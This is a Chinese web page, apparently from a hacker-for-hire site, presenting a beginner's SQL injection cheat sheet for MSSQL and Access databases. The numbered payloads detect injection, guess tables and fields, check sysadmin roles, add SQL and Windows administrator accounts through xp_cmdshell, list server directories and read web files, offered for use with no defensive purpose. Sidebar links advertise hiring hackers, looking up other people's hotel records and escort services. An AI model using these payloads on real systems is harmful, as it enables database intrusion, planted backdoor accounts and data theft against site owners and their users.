找黑客平台

黑客大户的联系方式-黑帽黑客入门(如何成为黑客 基础入门

访客4年前黑客资讯966

1.判断是否有注入 
;and 1=1 
;and 1=2 

2.初步判断是否是mssql 
;and user>0 

3.注入参数是字符 
'and [查询条件] and ''=' 

4.搜索时没过滤参数的 
'and [查询条件] and '%25'=' 

5.判断数据库系统 
;and (select count(*) from sysobjects)>0 mssql 
;and (select count(*) from msysobjects)>0 access 

6.猜数据库 
;and (Select Count(*) from [数据库名])>0 

7.猜字段 
;and (Select Count(字段名) from 数据库名)>0 

8.猜字段中记录长度 
;and (select top 1 len(字段名) from 数据库名)>0 

9.(1)猜字段的ascii值(access) 
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 

(2)猜字段的ascii值(mssql) 
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 

10.测试权限结构(mssql) 
;and 1=(Select IS_SRVROLEMEMBER('sysadmin'));-- 
;and 1=(Select IS_SRVROLEMEMBER('serveradmin'));-- 
;and 1=(Select IS_SRVROLEMEMBER('setupadmin'));-- 
;and 1=(Select IS_SRVROLEMEMBER('securityadmin'));-- 
;and 1=(Select IS_SRVROLEMEMBER('diskadmin'));-- 
;and 1=(Select IS_SRVROLEMEMBER('bulkadmin'));-- 
;and 1=(Select IS_MEMBER('db_owner'));-- 

11.添加mssql和系统的帐户 
;exec master.dbo.sp_addlogin username;-- 
;exec master.dbo.sp_password null,username,password;--  
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';-- 
;exec master.dbo.xp_cmdshell 'net user username password /add';--  
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--  

12.(1)遍历目录 
;create table dirs(paths varchar(100), id int) 
;insert dirs exec master.dbo.xp_dirtree 'c:\' 
;and (select top 1 paths from dirs)>0 
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 

(2)遍历目录 
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构 
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 

返回列表

上一篇:房产知识:期房办房产证流程是什么啊

下一篇:淘宝刷客兼职是真的吗,教你识别真假!

相关文章

海内诚信黑客接单

网页搜索白客接单子,期待对给你輔助 DDOS?--!网络黑客不接单子,基本原理非常简单,会与去做是2件事。 有一个能够立即走贷款担保的网络黑客 要搞好两年吧,赶紧劝他投案自首得了。 如何变成一名网络黑...

黑客现场解锁手机节目(手机黑客视频)

黑客现场解锁手机节目(手机黑客视频)

本文目录一览: 1、蒋昌建主持的黑客节目叫什么 2、支付宝真的安全吗?顶级黑客现场破解 3、黑客支付宝综艺叫什么哪一集? 蒋昌建主持的黑客节目叫什么 《智造将来》。由支付宝独家冠名,在浙江卫...

上海有没有做过伴游的-【喻万敏】

“上海有没有做过伴游的-【喻万敏】” 小编简单的介绍了“成都商务在线预约”全部内容伴游模特经纪人的价格 微博地址:2084手机号:15791***148相册是过去几年陆续走过的一些地方留...

实例解析:敏捷开发项目管理五步走

实例解析:敏捷开发项目管理五步走

不少创业公司的产品经理需要兼顾项目经理的工作,并且全职测试角色。这篇文章讲产品经理如何进行高效的敏捷开发项目管理。 一、背景交代 背景,利用公司原有的项目管理方式,产品无法按时上线,产品质量难以保障...

熬夜的危害(常熬夜有五大危害)

熬夜的危害(常熬夜有五大危害)熬夜对身体来说可以说是严重的摧残,会损害我们身体的健康,但是在工作中有时不得不熬夜,那么首先我们要需要了解一下熬夜对身体会造成哪些危害,还要做好熬夜后的护理工作。所以在日...

如何查别人开房记录 私家侦探真的能找到开房记录吗

如何查别人开房记录 私家侦探真的能找到开房记录吗

微信是亲朋好友的聊天工具。一些使用微信的用户是老年人。他们不使用拼音和笔画来输入文本。他们想知道如何使用语音输入文本的功能。想要了解的用户可以快速搜索,查看语音输入的详细方法。不要错过。 查开房...

Copyright Your WebSite.Some Rights Reserved.

免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!

Hacker by Hacker.